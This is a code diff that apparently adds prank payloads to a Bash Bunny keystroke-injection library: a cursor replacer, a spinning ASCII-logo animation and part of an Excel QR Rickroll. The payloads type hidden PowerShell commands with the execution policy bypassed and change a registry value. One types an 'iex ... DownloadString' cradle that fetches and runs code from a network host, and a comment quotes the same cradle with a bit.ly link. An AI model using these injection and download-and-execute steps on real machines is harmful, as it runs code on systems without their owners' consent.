RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\QRcode.ps1')"
LED FINNISH

22
payloads/library/prank/Win_PoSH_ExcelQRRickroll/readme.md Normal file
View File

@ -0,0 +1,22 @@
# Excel QR Rickroll
* Author: Cribbit
* Version: 1.0
* Target: Windows (Powershell 5.1+) + Excel
* Category: pranks
* Attackmode: HID
* Extensions: Run
## Change Log
| Version | Changes |
| ------- | ------------------------------|
| 1.0 | Initial release |
## Description
Create a QR code in Excel that points to Rick Astley - Never Gonna Give You Up on YouTube
## Colors
| Status | Color | Description |
| --------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode, getting the switch position |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISH | Green blink followed by SOLID | Script is finished |

BIN
payloads/library/prank/Win_PoSH_ReplaceCursor/b.ani Normal file
View File

Binary file not shown.

BIN
payloads/library/prank/Win_PoSH_ReplaceCursor/b.cur Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 4.2 KiB

20
payloads/library/prank/Win_PoSH_ReplaceCursor/payload.txt Normal file
View File

@ -0,0 +1,20 @@
# Title: Replace Cursor
# Description: Replaces the standard arrow with a little bash bunny.
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows (Powershell 5.1+)
# Attackmodes: HID & STORAGE
# Extensions: Run
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED ATTACK
RUN WIN "powershell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ps.ps1')"
LED FINNISH

15
payloads/library/prank/Win_PoSH_ReplaceCursor/ps.ps1 Normal file
View File

@ -0,0 +1,15 @@
# Copies the bunny ani file to the users profile.
$p=(gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\b.ani'
$f= $Env:USERPROFILE+'\b.ani'
if (Test-Path $p)
{
cp $p $f
}
else
{
cp ($p -replace "1", "2") $f
}
# Set the registory value of Arrow to the new cursor
sp 'HKCU:Control Panel\Cursors' Arrow '%USERPROFILE%\b.ani';
# Tell the system to update the displayed cursor
(Add-Type -Name c -Pass -M '[DllImport("user32.dll")] public static extern bool SystemParametersInfo(int A,int b,int c,int d);')::SystemParametersInfo(87,0,0,3)

47
payloads/library/prank/Win_PoSH_ReplaceCursor/readme.md Normal file
View File

@ -0,0 +1,47 @@
# Replace Cursor
- Author: Cribbit
- Version: 1.0
- Target: Windows 10 (Powershell 5.1+)
- Category: Pranks
- Attackmode: HID & Storage
- Extensions: Run
- Props: The Hak5 Team (Wallpaper changer & Eject USB sound)
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Replaces the standard arrow with a little bash bunny icon.
## Notes
I have included a both a static and animated cursor.
## Information about SystemParametersInfo
### Microsoft Doc:
https://docs.microsoft.com/en-gb/windows/win32/api/winuser/nf-winuser-systemparametersinfoa
### Flags
```
SPI_SETCURSORS = 0x0057;
```
Convert uint to int = 87;
```
SPIF_UPDATEINIFILE = 0x01;
SPIF_SENDCHANGE = 0x02;
```
Bitwise "OR" these two together (0x01 -bor 0x02) = 3;
## Colours
| Status | Colour | Description |
| ------ | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISH | Green blink followed by SOLID | Script is finished |

BIN
payloads/library/prank/Win_PoSH_ReplaceCursor/w.cur Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 14 KiB

BIN
payloads/library/prank/Win_PoSH_SpinningAround/demo.gif Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 240 KiB

39
payloads/library/prank/Win_PoSH_SpinningAround/payload.txt Normal file
View File

@ -0,0 +1,39 @@
#!/bin/bash
# Title: Spinning Around
# Description: Spinning Ascii Hak5 Logo
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
# Props: TW-D - inspiration, audibleblink - python server
# Super mad Prop: Lee Holmes - Powershell Rickroll iex (New-Object Net.WebClient).DownloadString(“http://bit.ly/e0Mw9w")
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN Powershell
QUACK DELAY 500
QUACK STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/spin\")"
QUACK ENTER
LED FINISH

28
payloads/library/prank/Win_PoSH_SpinningAround/readme.md Normal file
View File

@ -0,0 +1,28 @@
# Spinning Around
- Author: Cribbit
- Version: 1.0
- Target: Windows (Powershell 5.1+)
- Category: Pranks
- Attackmode: HID & RNDIS_ETHERNET
- Extensions: Run
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Spinning Ascii Hak5 Logo in a powershell window\
![Demo](demo.gif)
## Props
To TW-D for the inspiration, audibleblink for python server code "execution/ShellExec/payload.txt" and
Super mad props to Lee Holmes for Powershell Rickroll for the animation code.
https://www.leeholmes.com/powershell-and-html5/
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Injection finished |

71
payloads/library/prank/Win_PoSH_SpinningAround/spin Normal file
View File

@ -0,0 +1,71 @@

$frames = @(
" # # # # # ;;iii; ,::::, ..,. # # :MX,:,M 0ii;2r MMMMMMMMMMMMMMMMMr # # SX.,.iW B7 ,i; 0MM@BWWWMMMMMMMMMM # # a.., 0Z r...: .... . ..MMM8a8880r,:iiiii, # # X.,, ZX .:, 2Z .;. XM722r, .MM7Si,MMMr :ZZZZZZ0, # # r.,,...,:;;::,..i. iM2 ..:r rMM iMMZ X0ZZZ8Z0MMMMMMM0 # # ,,,, ;a7;,.,.,,: ,Mr .S .r ;MB :8 ,8MB88808Z000BBBBWMX # # i,,.8;77,i.;2.,,:iMX 8M. ; XMZ SMM0000ZZMMM0Z8880M: # # 2S.,.M: X7 ,.;Ma SMMr ,.WMr .MB , MMMMaZZZZB0 # # ,2 ,. M Zr.,.0W .;i. ...MM iMMB 7SZaX:SMMMZZZZZ8@i # # r;.,.:Z @Z..i0. ;i: ;Z,. MM , @M2ZM@MMMWMMM02ZZZZWS # # r;:;.2: S,:,iZ ;r ,MX,,82.;X 2MMB000088MM@aaZZZBa # # .:i;:. ... .. MMMMMMZZ888ZBMMZaZZ8W2 # # .ZaS8MB0008ZZ8ZZ80BWr # # .XZ88BB88000Zr # # # # # # # "
" # # # # # 7MMMMSXX2r X2ZWai7X7. # # ,MMMM87i;7: SMMMM8:;2Z. BMMMMM@@WWB0BBZ2 # # ZMMM2 :ii7 MMMMM::i7 rMMMMMMMMMMMMMMMM # # WMMMr ii;a SMMMM:.ii: .. . :MMMMMW80BB77XX;7: # # MMMMi.iiiX, MMMM@;,,8MMMMS820MMMM22MMM; S08800 # # MMMM:,iii;7, .:i,SMMMa,i:2MMM0 :M@. Z0888BMMMMM7 # # WMMM ,iiiir7. ,:i,iMMX iS..MMM2 .S ZMB8888WBBWWM@ # # aMMM,:iiSrXMM@88X:i.7MZ WM aMM7 . :MM808B@M@800M2 # # ;MMMM7,i7r MMMMM,:i 0M XMM: iMM: WM. ZMMMMMBZ80M, # # MMMM;.iiri MMMMB ::,Mr .::,.. MM. MMZ 2ZM@BWMWZ88W8 # # ,MMM8 ,iir, .MMMMW7,,28.:S8SX;, 0@ MMMZ@W8ZaWM0Z80M. # # iMMMZ :ii; XMMMMS:i:2X:SWMMMM:iZa,7MMMM888Z0MWZ88@X # # iMMMa,7XXi .iSB::i,7;, MMMMMM8WB8808BW880@S # # ,. ,,. :ZMWBMMW@WWBBW@Br # # ,iiXXXi: # # # # # # # "
" # # # ,,,;rrX;:. # # SMMMMMMMMMMZ8@MMMM@Sa2 # # MMMMMMMMMB2X7WMMMMMXZ0 i@BBBBBM0ZaSX: # # MMMMMM@MMSi7rWMMMMMXXX MMMMMMMMMMMMMM # # .MM@@@@W@MX;r7MMMMMZiX; 7MMMMMMMWWB7XZi # # ;MM@@@@@MM7r7;BWW@M8;2MMM0ZMMWXWMXSBW8 # # iMM@@@@@MM;r7;i,:i;rrXMMWr;BM0 BZ aBBWMMM # # iMM@@@@@M@;r7;iri,irr;MMiXi2MB,Xi8@0B@@MM # # MM@@@@@M@ir7SZMM8ZX;rM2:MrrM0:ii@MBWMW@M # # iMM@@@@@MMX;XMMMMMM;;SMi2MXiMZ7M:XMMM@0M8 # # MM@@@@@@M0rrr@MMMM0iiZ8:7X;:MaXMS2WB@W0Mr # # ;MM@@@@@@Mr;r;MM@@MBr;BX;a27,0XXMM088@BBM # # 2MM@@@@@M@;rrrMMMMM8r787@MMMiZX8MM00BM0MX # # BMMMMMMMMW;rrS@MMMMS7XSiMMMMMMMMBB0BBW@@ # # rZ88W@MMMM7aa S@@MMMMMMM@W8 # # # # # # # # # "
" # # # 2a222222aBBB0; # # rMMMMMMMMMMMMMMMM: # # 7MMMMMMMMMMMMMBMM@80BX # # XMM@@@@@@@WWMBZMWMMMMMa # # 8M@WWWWWWWWWM0ZM0WMMMM, # # ZM@@@@@@@@W@M0ZM0BBWMX # # ZM@@@@@@@@@@MB2aZ008WM: # # ZM@@@@@@@@@@M82aa008@Mi # # ZM@@@@@@@@@@M8Z@8008WMi # # XM@WWW@@@@@@MBBM80B0WM # # WMWWBBBBBBBWW80MZZZWMM # # MMWWWWWWWWWW@Z0MZ8ZBMM # # MMWWWWWWWWW@@a0MaWW0MW # # MM@@@@@WWW@@@aWM0MMMMB # # MMMMMMMMMMMMMBWMMMMMM, # # i,...irrrrrrX. # # # # # # # "
" # # # r8B0222222222; # # XMMMMMMMMMMMMMMMMM, # # 7ZB0008MMMMW@MMMMMMMMMMMMX # # ,MMMMMMMMWMM00@@@@@W@@@@MMX # # ZMM@@@@B8WW88@WWWWWWWWW@M0 # # 2MBWBBB0WW88@@WWWWWWW@@MW # # MM@0BB0W88888@@@@@@@@@@@MW # # @MM8BW0W88088@@@@@@@@@@@MW # # WMM80B0B0WM08@@@@@@@@@@@Ma # # WMB0BBWB8@MW8@@@@@@@@WW@MX # # 2M@@W0808W@WZWWBBBBBBBBWMM # # XMMMB8BB0W@WZBWWWWWWWWWWMM, # # .MM@BBMB8WMWZB@WWWWWWWW@MMi # # MMMMMMMB@MM8BM@@@@@@@@@MM2 # # ;MM@MMMMW00@MMMMMMMMMMMMMZ # # ;r;;ri..... . # # # # # # # "
" # # # ...;7;., # # i08ZMMMWWWWBBMMMMMMMMM7 # # ,X2Z88WMMWBBBWi :M0aMMMMMMZXS8MMMMMMMMM # # 2MMMMMMMMMMMMMB aSSMMMMMMZ7XraMMMMMMMM # # 82XX@MWMMMMMMM; rXraMM@MMB7XrSMM@@@@MMr # # 0WB8r0MBaMMMB@MMMMS;ZM@@WMB7X77@M@@@@MMX # # 7MMMWBB0i:@8,WMM22aMMM7r7r;ri;7XXXr@M@@@@MM7 # # BMMWWBBW@7r2;WMW;a7XM@r77ri;XXrXXXrWM@@@@MMX # # 7MWWMWBWMZir;0MZiWZ:BM77X00@MMaSXXrBM@@@@MM # # MWBMMMMBiXM;aMS;MM;XMS77WMMMMM@77XMM@@WWMM7 # # @MB@@BWWSBM;2M7rXS7;B877aMMMMMBr77ZM@@W@MMM: # # rMWW@0B@WMM77@rXaZar2WX70MM@@MWr7rrWM@@@MMMZ # # MMBMWBWWMM8S0XZMMM8SBSXaMMMMMM7X7rBM@@@@MMW # # ,MMWWBBBWWMMMMMMM; r2XX7@M@WW02SXr0MMMMMMMM # # iWMMMMMMMMMMWZ iZZX0M@W82SXS # # , # # # # # # # "
" # # # # # :XrX708Xi r2XXZMMB: # # X0BBWWMMMMMMMMMMZ rB27;MMMMi ;S7rXWMMM # # 7MMMMMMMMMMMMMMMM; ,X;i7MMMM ,S;;::ZMM2 # # ;7i;SXrBWB00MMMMMi . ,. i:i.7MMMX Z;i:.7MMM # # ZB88Z8; ZMMMZaMMMMMXBaMMMMM;:.7@MMM :X;ii,iMM@ # # 0MMMMMB88880X rMMi,8MMMW,;;;MMMM:::,..:rr;7;;;i:,MM@ # # .MMWWBBW8Z880@MX :Z:.XMMM;.rX .@M@.:::, :7Z7ii;i: @M@ # # @@008@MM080Z0MW.. :.;MMW..2M: .MMi,iiaBBM8rSra;i:,MM0 # # XM0880MMMMMr :.,MB .MM2 ,BMM. rMX,i:7MMMB aXi:rMMMX # # MB08ZWM@WM@SZS.BMM BMi,:::;.. 0B,ii,MMMM :Xii.;MMM # # rMB8Z8MM8ZBMMM8MMM aM.:;XSZ0r,i@X::SMMMM. ,X;i, 0MMi # # ZM08ZBM@800BBMMMMX.7Bri0MMMB;X:0Xii:aMMMS r;i: aMM7 # # 8M08ZW@88008B0BMMMMM, .,;;:: iai. iS2X:SMM: # # S@MWBBBBWWWMMW@Br. # # :;XXaZXri, # # # # # # # "
" # # # # # .,,,.....,,,,. ::,::, ,r.::i: # # ;MMMMMMMMMMMMMMMMM, X27ii7 MM.::2M. # # 0MMMMMMMMMMWWWWMMM. ;7..;; 2M. .,2X # # :.;;ii: 2B88ZZWMM ,, ... .X ,,r .MZ . :Z # # 7BZZZZ80X.7MM7 :X7MB 7X8X2 iX..2X.,. MZ ..,X # # 8MMMMMMMWZZZZZZB2. 8MMi. MM :r,:.X8 ,7.,:;i;;, ..,,,i # # :M@BBBB0008Z0880B@M8, ,@7 8M r: X7 rS ;r.,,::,;XZ; .,,. # # MB8888ZWMMX7B0BBBMMS .. XM ;..B;. rr,X.,,Xi ,i27B0..:7 # # 2@8ZZZZ8MMW : 0Mi ,M. i.:M88, X7;.,,i, MM .,2X # # @B88ZZaWMMX ;SaaSX: 8M,; M0.,,.:rX:. X0i..;X MM .,.a. # # ;M088ZaaMMMMMMMMMMBXM ,. BM,.:7:,:i7,.0S..S0 ;M. ..X; # # XM08ZZa8MMM88080BWMM 7;.;@;;;2 :7.aS:i:r. @B,7iri # # 7MB8ZZa0MMBZZ888ZMMMMM. . . ,.:.,. # # ,W@B8ZaZ08Z88080M@8Ba # # ;ZBBBBBBWWB80X # # # # # # # "
" # # # # # .2ZZZ0B0ZZaaZZaSSXX . # # :MMMMMMMMMMMMMMMMMM: SMMMMr7rrSMMMM2:r0. # # rM@M@@@@@MMW0000B@M7 2MMMM..:,aMMMMZ ,8X # # BMZZZ80@M: . MMMM. ,,.MMMMM .:S # # .,, iMBZZZ80@M8i;;rMMMr7iSMMMX;;iMMMM. ;;MMMMM ,,X # # ;MMMMMMMW80BZZZ80B@W; ;MMM ,iMMMM SMMM . ,,X. # # MMBBB0008ZZBBZ8880BWM@; XZ .rMMM2 X aMM .., ;X. ,:: # # 0@08888ZZ0 MMWBBWB8WMM . MMM. ,M8 MM .;rMMMMM.,7 # # :@8ZZZZZZW :MMW :Ma WM@ 7MM: Mr ,,iMMMMM .7X # # ZW88Z888B0 ,::,.WMMr. :MMM ZMX . SW..X:MMMMM .:X # # BW888880MS BMMMMB88BM7XMMM ;M: :i0MMW, 0:,; ;MMMMX,iX # # B@88880BM, MMZZZZ8B@2 r8M;.,B7ii .7Z@X.X:, i;,:: # # Z@08880WW 2MBaZ8800BMX: # # r@B8880BWMMBZ88880WMMM # # 8@WBBB088800WWW@r # # .SZB08880ZZ7;, # # # # # "
" # # # .... # # 7MMMMMMMMMMMMMMMMMMWWWr # # .MMMMMMMMMMM@@@MMMMMMMa WMMMMMWX72ZWBr;: # # .MMMMMM@@MMM@WWBBBBB@MZ MMMMMM@i;MMMM27Z # # MMMMMM880B@Mi WMMMMMM.,WMMMZ,2 # # :;;;: 8MBWMMW800BMM8r2MMM02MMMW:iZMMS 2MMMZ,S. # # rMMMMMMM@8ZZZZ8B880BWMW;.7MMX.BMM2 .MMX , .iX # # MMMMMMB008888ZZZ88800B@M2 .8;.2MMr 7 7M7 ::rZ;ir # # MMMMMWZ8888888@MM@88880MMi. : XMM,.M2 M0.iMMMMrr, # # SMMMMMa888888BX .2M@WW@MX ,aW iM@ iMB r@,,@MMM;;X # # MMMMM8Z88888BS BMMMMMB:.rMM..MZ., :, 0r,MMMMXir # # ;MMMMMZ888880WMMM@000B0@SMMM, M2.ZMMM7SX:78WMZ;X # # ZMMMMWZ88800BBMMMZaZ8BWZ8BMS,22::i:X:. # # 0MMMMWZ88008ZBMMWZ800B2:. # # ZMMMMWZ8888ZZWMM88800@MMi # # :MMMMM88088ZZ0080BWM2 # # i8@MMM@@WWWWW@W8S; # # ,;X2XXXi. # # # "
" # # # ::,:rrrrXZ2SSSri. # # XMMMMMMMMMMMMMMMMMMMMX # # MMMMMMMMMMMM@MMMMMMMZ WW000MMMSrSr # # ;W8ZZW@MMMM@@@@@@W@MM MMMMMMMMZMMMX # # MMMMMMMMMMB@Ma MMMMMMMMXWM@X # # ir;i.WM@@@WWWWMWWMMSaM8ZMZaM2ZMWr # # MMMMMMMWWWW0000BBB@MZ:Wa;MS:MZ;72r # # aMMMMMM@@@@B0BBBBBBWWMS7XSMS;0Z;Z0; # # ZMM@@@@@@@@0BBBB@MWBBM@;;2MXBaZSMMX # # :MM@@@@@@@@0BBBBWM@WWM27ZXM7BSZSMMS # # MMM@@@@@MMW0BBBBWW@MMX2MXW7XS2aMMa # # 8MM@@@@@@M@0BBBB@@WW@B@MSBaMMXX7Si # # MMM@@@@@MMBBBB0WMB0WBZ@XX: # # ZMMMM@@MMM@0BB0BMW0WB: # # MMMMMMMMMMB0BB0MMBB@MZ # # MMMMMMMMMM0BBBBWB@M # # MMMMMMMMMMWWWWMMW: # # ;rSaZWWMMMMM@Zi # # # "
" # # # ZZ222228BBBBWZ # # ,MMMMMMMMMMMMMM # # MMMMMMMMMMMMMMi # # 2BMMMMMMMMMMMMS # # MM@@@@@@@@MMX # # 2MM@W@@@@W@MMX # # aMMWBBBBBBBBWMX # # 2MWBBBBBBBBBBMX # # SMM@@@@@@@@@MMX # # SMM@@@@@@@@@MM7 # # SMM@@@@@@@@@MM7 # # SMM@@@@@@@@@MM7 # # :MM@@@@@@@@@MM. # # .MM@@@@@@@@@MM. # # MM@@@@@@@@@MM. # # MMMMMMMMMMMMM. # # 8MMMMMMMMMMMM # # iMMMMMMMMMMMM # # # "
" # # # .;Xa22aaa2rrrrr;, # # BMMMMMMMMMMMMMMMMMMM2 # # .7r2@M@0000BXWMMMMMMMMMMMMMMMMMMM # # ZMMMMMMMMMMMMMM@MMMMM@MMMM@0ZZZBS # # 2MM8MMMMMMMMMWW@MM@@@@@@M0 # # 7MMZMBB@8@BZ@WW@WWWW@WWWM0,irr # # 7BZa@aZW2W2Z@WWWWBBWWWWW@MMMMMM; # # rM8aWa8@aZZ@WWWWWWWWWWW@MMMMMMMM # # aMMZ0B8@a2BMWWMMWWWW@@@@@@@@MMMM # # 8M@ZZB8W88a@WWM@WWWWW@@@@@@@@@MZ # # 0MM00ZZWB@2WWWBWWWWWW@@@@@@@@@M; # # ,XS8MMW@WMW@W@@WWWWW@@@@@@@@@MM # # ,S00B@WW@WWWWWM@MM@@@@@MZ # # :0MW@@WWWW@M@@@@@@@MM # # MM@W@@WWWWM@@@@MMM@MX # # WM@@WWWWMMMMMMMMMM@ # # WMMM@@MMMMMMMMMM@ # # ;BMMMMMMMWW8aar # # . # "
" # # # ..... # # XM@MMMMMMMMMMMMMMMMMMMS # # ;rZB22SS@MMMMWWX ZMMMMMMMMMMMMMMMMMMMMM, # # MaMMMMZXMMMMMMMS ZM@WWWWWW@WWMMM@MM@@@MX # # :87MMMMXi@MMMMMM ,M@B00BMMMMMM; # # ,ar@MM@iXMMZ7XMMMBZMMMW20M@B000WM@WWWMr:iiii. # # .2;:,:r;XMMi..@MMSrMM077BMB0000B8ZZ880MMMMMMMM2 # # S7SZrri7M2:S,8MMXiZXi2M@B00008888800BWBMMMMMMM. # # rS8MMM2:SM:ZM,XMM;iii;MM00000BMMW0000000BM@MMMM # # 2X8MMM7:8a:BMi;MM:2@ri7M@@W@@Mi ZB0000080M@@MMM # # S7WMMMS;0rrri;iMW,8M0:i8MMMMMMr 8W00000ZWM@@@Mi # # X70WZ8XS82MMMaiWBi0MM2BBBBBB@MMMB0000000MM@@MB # # ,;.:,;aSrWM0ZW08888MMMW0000000MMMMMM # # i,XW0008WMMB8000000MMM@MM # # MMMWB000MMW8000008MMMMMM # # iMMWB0000000000MMMMM0 # # ,20MM@@W@@@MMMMMW2 # # :rSZ882Xr. # # # "
" # # # # # .. . Xa2ZZZZZZBWBBBBB0Z2 # # 2SrSMMMWWX7S2MMMMB BMMMMMMMMMMMMMMMMMM. # # .MX:XMMMMM;:i;MMMMM ,MMWBBBB0@MMMMMMMMMM: # # iS:,8MMMM@.i rMMMM; .. WMB000ZWMZ # # ;X:.8MMMMMi,iMMMMiXrWMMM07rWMMM7XraMM088888MM, .,., # # :ri. ,i,,MMM; :.SMMMM,:XMMZ:.i8@008888008BMMMMMMMM: # # ri,.Xr ::: WM7 iX MMMW..iZ. ;0MW0880088BBBBBBBBWWBMM # # rr,8MMMM@;:,,M8 MM aMMZ . .8MM8Z0WWWMMB ZB0000008M@ # # .Zi.8MMMMM.:.XM XMM. ,MMX :Ma . 2MMM BB888888aM: # # iX: 8MMMMW7,:B7 .. .. WMi XMMS .:0MM0 ,. 7M088888Z@B # # ;XriMMMM@;ri;8,7MMMWr: ZM: SMMMX8W800@MMMMX MB88888ZBM # # . . :,,7,20X;,.r:2Zi:0MZr,WB8Z800WMM B@08888ZWM # # ;ZWB088888MMX;M088880MB # # ZMMMB008080MM@W00880WW7 # # WM@WW08800000BWWS # # :iXZB00WWWWB8r # # # # # "
" # # # # # .,.,.i :,..,. :,iiiiiiiiii;:,.. # # MS:irMMX i7i;7BM MMMMMMMMMMMMMMMMMB # # rZ,. rMM, .7,, MM SM@BBBBW@MMMMMMMMM # # S:.. BMM :i, MX .. ...aM0ZZ880r ., # # X,,, BM@ ..,Z,..MB :XZXXZ ;S;r ,Za::0BZZZZZ0. . # # i::. ,;i:i,. MB .S,,.,M ,i,i.X8r ;08ZZZZ80WMMMMMMMB. # # .::. ;27:::.,. WM i.,Z ZX ;i.iZX :MM0888800BB0000BBBM2 # # r:,:WMMr:.,X:,. MW . BS. iB ;:.:. :XM@0000B2 0MBZZ8888Mr # # XS,,,MMB ;., ,M7 ZMXr B. ;.:S;:. .. MMZZZZZZ8W # # S.,. MMS ,a,. Z0 i:;,. XS ; 7, Si ;7;77X; WMW2ZZZZZWr # # ,7., :MM ;0,.,B. X7, ,ri,.@2i.; XaM@MMMMM,rMM2ZZZZZBZ # # ,7i7.0Bi iii::Z,;8 rii@Z:;X.: ZMB0000BS MMZaZZZZB8 # # MMWM@8ZZZZ0ZMM02ZZZZBZ # # Z@S,@088Z88WW8ZZZ8BB7 # # rBBBWWWB0BWWW0S # # .:,..,,: # # # # # "
)
$counter = 0
$maxCounter = $frames.Count
$host.UI.RawUI.BackgroundColor = "Black"
$host.UI.RawUI.ForegroundColor = "Red"
1..4 | % {
try
{
$host.UI.RawUI.WindowSize = New-Object System.Management.Automation.Host.Size 72,30
}
catch {}
}
try
{
Clear-Host
$host.UI.RawUI.CursorPosition = New-Object System.Management.Automation.Host.Coordinates `
0,([Console]::WindowHeight - 1)
Write-Host -NoNewLine 'Press Q to Quit'
## Loop through the frames and display them
[Console]::TreatControlCAsInput = $true
while($true)
{
if([Console]::KeyAvailable)
{
$key = [Console]::ReadKey()
if(($key.Key -eq 'Escape') -or
($key.Key -eq 'Q') -or
($key.Key -eq 'C'))
{
break
}
}
$host.UI.RawUI.CursorPosition = New-Object System.Management.Automation.Host.Coordinates 0,0
Write-Host (($frames[$counter] -split "`t") -join "`r`n")
Start-Sleep -m 150
$counter = ($counter + 1) % $maxCounter
}
}
finally
{
## Clean up, display exit screen
Clear-Host
$frames[0] -split "`t"
"`n"
" Trust Your Technolust"
"`n`n`n"
}